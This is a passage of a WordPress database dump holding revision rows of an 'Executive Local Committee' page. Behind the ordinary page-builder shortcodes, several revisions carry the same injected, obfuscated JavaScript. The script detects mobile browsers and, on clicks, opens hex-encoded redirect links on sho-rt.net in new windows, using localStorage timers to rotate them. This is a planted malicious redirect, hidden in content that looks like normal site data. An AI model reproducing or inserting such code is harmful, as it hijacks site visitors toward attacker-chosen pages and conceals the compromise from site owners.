_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:16:01','2023-06-27 07:16:01','',4849,'https://gsw2023.com/?p=4854',0,'revision','',0),
(4855,4,'2023-06-27 07:18:37','2023-06-27 07:18:37','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66, 75\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:18:37','2023-06-27 07:18:37','',4849,'https://gsw2023.com/?p=4855',0,'revision','',0),
(4856,4,'2023-06-27 07:20:05','2023-06-27 07:20:05','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:20:05','2023-06-27 07:20:05','',4849,'https://gsw2023.com/?p=4856',0,'revision','',0),
(4859,4,'2023-06-27 07:25:45','2023-06-27 07:25:45','[vc_row][vc_column][vc_single_image image=\"4613\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 